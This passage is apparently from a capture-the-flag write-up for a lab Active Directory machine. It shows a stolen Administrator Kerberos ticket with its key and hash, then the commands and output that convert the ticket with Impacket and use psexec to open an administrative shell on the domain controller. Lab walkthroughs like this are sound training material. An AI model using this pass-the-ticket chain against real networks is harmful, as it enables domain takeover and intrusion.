doIFnjCCBZqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMR0FSRklFTEQuSFRCo4IEaTCCBGWgAwIBEqEDAgECooIEVwSCBFN/rS4mxXtOTpd19Ni0euq70trznuxOb23di2ABlMQNF1P2yHL5O4EXQqKBPhPtjzGSeAiBaM183iQ0DwyebJ8bXCkttQyeypZvLbdLC9b6QX29cRcE9rz0SVld4q82qRcNUPHO5CpXZuE24PxWyCTAc+6BYLBiXiEJG/iTe6ULBwdI/1bx6yfgJVHIoSa4oouyjQa9Pk8sF7GnCFJ+N6em3+UB8jufugTr3rPRcGwK86KU5IexysppzWG010weYubFM3o6/IjBskGjKwmeouYsCXFdAUSLvA0tteviQHTqx9Vb6Dsb6VIXd2Ey3bI+8KadHF+D4wc7cwQO+wz0tsXSVt1zYdOVCC8aEajOsj87Fo+UgZIKUvxf9buv7lP6cltplWmDW+lyPFP0SxSrY1DWEkXpHB9qgWIKTU6QnqYGLk+RZiDHaxpjg3kijyaa6muy96+xeHpNjeD+Xcn07YODYGa+MZWDOvq5zGrflmB5n8pb0ddX9OCGn2hm6Kgxx34Ki3Fp1LIn4o3uoz76S2St8SBSloCFgYP1LJHR81lwS7GjQzWEnLEoLAlJAgTwAyWKjkeSqtjUn+d6W5nQ2wv+LL2eyKwQdZVnd4Efofw0+hd5KPGbRua8pCwiF645GBK2eM4YHU71yysbCxxBZhuIWMfBdrXloH+5xp0JX06yV6u8rwtDOdMme+tNvd+A8ZlDcNoeq7oGBOuaRozkjkgJhXHAVDV0kr6xmCjwDcxSE61uMG6OukrmYat1QOfUU+E6lz5I3uzE07zlZYR6Yv8OW1jvZRPaczxe49VlJl56LBMuz6YPqV2rLpNZCZ8SIwPPMBMNYJTn7v2Q29DdO8dYTOIZTagDMEavpJfGmCnReZfE+kW6ak2lAcEwohQMSl6YWFUVK8M8y6chK9COR83oV9NXMTpRHPxnDf+Wm4B5/WrbxdNIZCiivI2fYQZ7H1jRb5yVTB0yJPkn2zLTgG6LPg+lsP95t57TYnPJWG1y8SCEWwimCegzTYuN3Ed39/MjP5yteWh+ANFoqS4nUf8WWOZXTzn+O2HZBbjclQWXcFncj8HHSokHfYXhL8wfSbxsQ3J8QOoYrQa9r7VkwUQv34uGcnfY7edZtCWX4YgzJuYf13bEAqcFXwIfyA2GzfCgkXwbKk/fQNkoOrTLtbNMzAhu0XIAk20NpxFBXmdvmyX0nTvcZStY2yqpvAXhj26Y3GPXFKCjZ5vaePG5EfMq+EX5UF1tA8ir/0YwOzuUvHER+IBGIjQy8fFB7N3NE1QGjmDGiaR5ZkyelVjAfaBh9rtmn4iPjSLKHY+ihj/uMTL5d0F4/6U3i5IllACm9ZKcL9RSx2mj5kI2CNIm6izU9aaOeBZd7/zZ7Uj2s+EMAFk22V+mdxPXe9MyODemNWTiCvDIvbCxwdh11TIU7pdS07rP3mYGVlXKd6cS32Mk+ts4Dw98d26VNW2Pp/SXou4Pg8ejgdgwgdWgAwIBAKKBzQSByn2BxzCBxKCBwTCBvjCBu6ArMCmgAwIBEqEiBCBjcWu0tyv1fqj4cnK5rW+6D3beV60viEUBdL6kWM6gfKEOGwxHQVJGSUVMRC5IVEKiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQAAAQAApREYDzIwMjYwNDExMDA0ODA4WqYRGA8yMDI2MDQxMTEwNDc0NlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxHQVJGSUVMRC5IVEI=

  ServiceName              :  krbtgt/GARFIELD.HTB
  ServiceRealm             :  GARFIELD.HTB
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  GARFIELD.HTB
  StartTime                :  4/10/2026 5:48:08 PM
  EndTime                  :  4/11/2026 3:47:46 AM
  RenewTill                :  1/1/0001 12:00:00 AM
  Flags                    :  name_canonicalize
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  Y3FrtLcr9X6o+HJyua1vug923letL4hFAXS+pFjOoHw=
  Password Hash            :  EE238F6DEBC752010428F20875B092D5

Back on the attack machine, decode the base64 ticket and convert it to ccache format:

1
$ echo doIFnjCCBZqgAwIBBaEDAgEWooIEsTCCBK1hggSpMIIEpaADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMR0FSRklFTEQuSFRCo4IEaTCCBGWgAwIBEqEDAgECooIEVwSCBFN/rS4mxXtOTpd19Ni0euq70trznuxOb23di2ABlMQNF1P2yHL5O4EXQqKBPhPtjzGSeAiBaM183iQ0DwyebJ8bXCkttQyeypZvLbdLC9b6QX29cRcE9rz0SVld4q82qRcNUPHO5CpXZuE24PxWyCTAc+6BYLBiXiEJG/iTe6ULBwdI/1bx6yfgJVHIoSa4oouyjQa9Pk8sF7GnCFJ+N6em3+UB8jufugTr3rPRcGwK86KU5IexysppzWG010weYubFM3o6/IjBskGjKwmeouYsCXFdAUSLvA0tteviQHTqx9Vb6Dsb6VIXd2Ey3bI+8KadHF+D4wc7cwQO+wz0tsXSVt1zYdOVCC8aEajOsj87Fo+UgZIKUvxf9buv7lP6cltplWmDW+lyPFP0SxSrY1DWEkXpHB9qgWIKTU6QnqYGLk+RZiDHaxpjg3kijyaa6muy96+xeHpNjeD+Xcn07YODYGa+MZWDOvq5zGrflmB5n8pb0ddX9OCGn2hm6Kgxx34Ki3Fp1LIn4o3uoz76S2St8SBSloCFgYP1LJHR81lwS7GjQzWEnLEoLAlJAgTwAyWKjkeSqtjUn+d6W5nQ2wv+LL2eyKwQdZVnd4Efofw0+hd5KPGbRua8pCwiF645GBK2eM4YHU71yysbCxxBZhuIWMfBdrXloH+5xp0JX06yV6u8rwtDOdMme+tNvd+A8ZlDcNoeq7oGBOuaRozkjkgJhXHAVDV0kr6xmCjwDcxSE61uMG6OukrmYat1QOfUU+E6lz5I3uzE07zlZYR6Yv8OW1jvZRPaczxe49VlJl56LBMuz6YPqV2rLpNZCZ8SIwPPMBMNYJTn7v2Q29DdO8dYTOIZTagDMEavpJfGmCnReZfE+kW6ak2lAcEwohQMSl6YWFUVK8M8y6chK9COR83oV9NXMTpRHPxnDf+Wm4B5/WrbxdNIZCiivI2fYQZ7H1jRb5yVTB0yJPkn2zLTgG6LPg+lsP95t57TYnPJWG1y8SCEWwimCegzTYuN3Ed39/MjP5yteWh+ANFoqS4nUf8WWOZXTzn+O2HZBbjclQWXcFncj8HHSokHfYXhL8wfSbxsQ3J8QOoYrQa9r7VkwUQv34uGcnfY7edZtCWX4YgzJuYf13bEAqcFXwIfyA2GzfCgkXwbKk/fQNkoOrTLtbNMzAhu0XIAk20NpxFBXmdvmyX0nTvcZStY2yqpvAXhj26Y3GPXFKCjZ5vaePG5EfMq+EX5UF1tA8ir/0YwOzuUvHER+IBGIjQy8fFB7N3NE1QGjmDGiaR5ZkyelVjAfaBh9rtmn4iPjSLKHY+ihj/uMTL5d0F4/6U3i5IllACm9ZKcL9RSx2mj5kI2CNIm6izU9aaOeBZd7/zZ7Uj2s+EMAFk22V+mdxPXe9MyODemNWTiCvDIvbCxwdh11TIU7pdS07rP3mYGVlXKd6cS32Mk+ts4Dw98d26VNW2Pp/SXou4Pg8ejgdgwgdWgAwIBAKKBzQSByn2BxzCBxKCBwTCBvjCBu6ArMCmgAwIBEqEiBCBjcWu0tyv1fqj4cnK5rW+6D3beV60viEUBdL6kWM6gfKEOGwxHQVJGSUVMRC5IVEKiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQAAAQAApREYDzIwMjYwNDExMDA0ODA4WqYRGA8yMDI2MDQxMTEwNDc0NlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxHQVJGSUVMRC5IVEI= | base64 -d > ticket.kirbi
1
2
3
4
5
$ impacket-ticketConverter ticket.kirbi ticket.ccache                              
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

Root Flag

Export the ticket and connect to DC01 as Administrator:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ export KRB5CCNAME=$(pwd)/ticket.ccache

$ impacket-psexec garfield.htb/Administrator@DC01.garfield.htb -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on DC01.garfield.htb.....
[*] Found writable share ADMIN$
[*] Uploading file cSccdTlS.exe
[*] Opening SVCManager on DC01.garfield.htb.....
[*] Creating service BEyZ on DC01.garfield.htb.....
[*] Starting service BEyZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>